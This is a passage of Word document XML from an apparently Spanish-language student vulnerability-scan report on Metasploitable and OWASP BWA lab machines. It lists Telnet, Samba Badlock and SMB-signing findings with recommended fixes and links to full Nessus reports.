                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D975CC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>para obtener credenciales u otra información confidencial y para modificar el tráfico intercambiado entre un cliente y</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D975CC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>servidor.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D975CC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Se prefiere SSH a Telnet, ya que protege las credenciales de escuchas ilegales y puede canalizar información adicional</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D975CC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>flujos de datos como una sesión X11.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6807FF0E" w14:textId="4787D4F7" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00D975CC" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D975CC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Deshabilite el servicio Telnet y use SSH en su lugar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F2B55" w:rsidRPr="0076603F" w14:paraId="450DFCD9" w14:textId="77777777" w:rsidTr="00DC02D3">
        <w:trPr>
          <w:trHeight w:val="846"/>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01395290" w14:textId="32D61D77" w:rsidR="005F2B55" w:rsidRPr="00F26227"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sidR="00D468D8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>2.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F210E58" w14:textId="217A0552" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00D468D8" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D468D8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Samba Badlock Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02300A02" w14:textId="25D8AA6C" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00D468D8" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07FCAB03" w14:textId="70FD1DC1" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00D468D8" w:rsidP="00D468D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D468D8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>La versión de Samba, un servidor CIFS/SMB para Linux y Unix, que se ejecuta en el host remoto se ve afectada por</w:t>
            </w:r>
            <w:r w:rsidR="00482C65">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una falla, conocida como Badlock, que existe en el Administrador de cuentas de seguridad (SAM) y la Autoridad de seguridad local</w:t>
            </w:r>
            <w:r w:rsidR="00482C65">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(Política de dominio) (LSAD) debido a una negociación incorrecta del nivel de autenticación sobre el procedimiento remoto</w:t>
            </w:r>
            <w:r w:rsidR="00482C65">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Canales de llamada (RPC). Un atacante man-in-the-middle que es capaz de interceptar el tráfico entre un</w:t>
            </w:r>
            <w:r w:rsidR="00482C65">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cliente y un servidor que aloja una base de datos SAM pueden explotar esta falla para forzar una degradación de la autenticación</w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3">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l</w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidRPr="00D468D8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> que </w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3" w:rsidRPr="00D468D8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>permit</w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>iría</w:t>
            </w:r>
            <w:r w:rsidRPr="00D468D8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> la ejecución de llamadas de red Samba arbitrarias en el contexto del usuario interceptado,</w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3">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 xml:space="preserve">como ver o modificar datos de seguridad </w:t>
            </w:r>
            <w:r w:rsidRPr="00D468D8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>confidenciales en la base de datos de Active Directory (AD) o deshabilitar</w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D468D8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>servicios críticos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03393760" w14:textId="5D8374E1" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00482C65" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00482C65">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Actualice a Samba versión 4.2.11 / 4.3.8 / 4.4.2 o posterior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F2B55" w:rsidRPr="0076603F" w14:paraId="5F4D0EE4" w14:textId="77777777" w:rsidTr="00DF77AB">
        <w:trPr>
          <w:trHeight w:val="2410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44A9F2C2" w14:textId="71B47D77" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="005F2B55" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F26227">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168</w:t>
            </w:r>
            <w:r w:rsidR="00BC3A83">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>.2.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46D2C72E" w14:textId="047E7EBC" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00BC3A83" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3A83">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>SMB Signing not required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F300D39" w14:textId="16748182" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="005F2B55" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46466A39" w14:textId="2B2A5DEB" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00E94A48" w:rsidP="00E94A48">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E94A48">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>No es necesario firmar en el servidor SMB remoto. Un atacante remoto no autenticado puede aprovechar esto para</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E94A48">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>realizar ataques man-in-the-middle contra el servidor SMB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1665ED4B" w14:textId="11D3A8A7" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00E94A48" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E94A48">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Hacer cumplir la firma de mensajes en la configuración del host.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29E27671" w14:textId="2034CC22" w:rsidR="005F2B55" w:rsidRDefault="005F2B55" w:rsidP="00D85A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFC6F17" w14:textId="77777777" w:rsidR="00C8634D" w:rsidRDefault="00C8634D" w:rsidP="00D85A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110CAE42" w14:textId="5408CD05" w:rsidR="009E267E" w:rsidRDefault="009E267E" w:rsidP="007E5322">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Se enlistaron las vulnerabilidades critica de ambas </w:t>
      </w:r>
      <w:r w:rsidR="000A77CB">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>máquinas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> y algunas de nivel medio ya que si se colocasen todas por lo cual adjuntamos un informe completo de todas las vulnerabilidades encontradas con su respectiva descripción en el siguiente enlace: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375DB1E" w14:textId="3167DC08" w:rsidR="007E5322" w:rsidRDefault="009E267E" w:rsidP="009E267E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Metasplotaible:</w:t>
      </w:r>
      <w:r w:rsidR="007E5322">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="007E5322" w:rsidRPr="00E42A0E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="es-419"/>
          </w:rPr>
          <w:t>https://drive.google.com/file/d/1Iv5TxKbQIwQNM1i6MXOgSHx30rkz92HT/view?usp=sharing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B6BE04D" w14:textId="77777777" w:rsidR="007E5322" w:rsidRDefault="007E5322" w:rsidP="009E267E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6594F627" w14:textId="441AB506" w:rsidR="009E267E" w:rsidRDefault="009E267E" w:rsidP="009E267E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E5322">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Owaspbw</w:t>
      </w:r>
      <w:r w:rsidR="000F0E63">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="007E5322">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="007E5322" w:rsidRPr="00E42A0E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://drive.google.com/file/d/1Ma_ADxzAZWksAam_nIseRP6wTlc1LxM-/view?usp=sharing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56CA36BC" w14:textId="77777777" w:rsidR="007E5322" w:rsidRPr="007E5322" w:rsidRDefault="007E5322" w:rsidP="009E267E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC8FC97" w14:textId="77777777" w:rsidR="009E267E" w:rsidRPr="007E5322" w:rsidRDefault="009E267E" w:rsidP="009E267E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2691CF52" w14:textId="1BE53AA3" w:rsidR="009E267E" w:rsidRPr="000A77CB" w:rsidRDefault="000A77CB" w:rsidP="009E267E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:sectPr w:rsidR="009E267E" w:rsidRPr="000A77CB" w:rsidSect="00C64EEA">
          <w:pgSz w:w="15840" w:h="12240" w:orient="landscape"/>
          <w:pgMar w:top="1701" w:right="1418" w:bottom="1701" w:left="1418" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="000A77CB">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">de las soluciones a vulnerabilidades identificadas:  </w:t>
      </w:r>
      <w:r w:rsidRPr="000A77CB">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3698FF95" w14:textId="4CC0CF06" w:rsidR="00C8634D" w:rsidRDefault="00873B25" w:rsidP="00D85A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
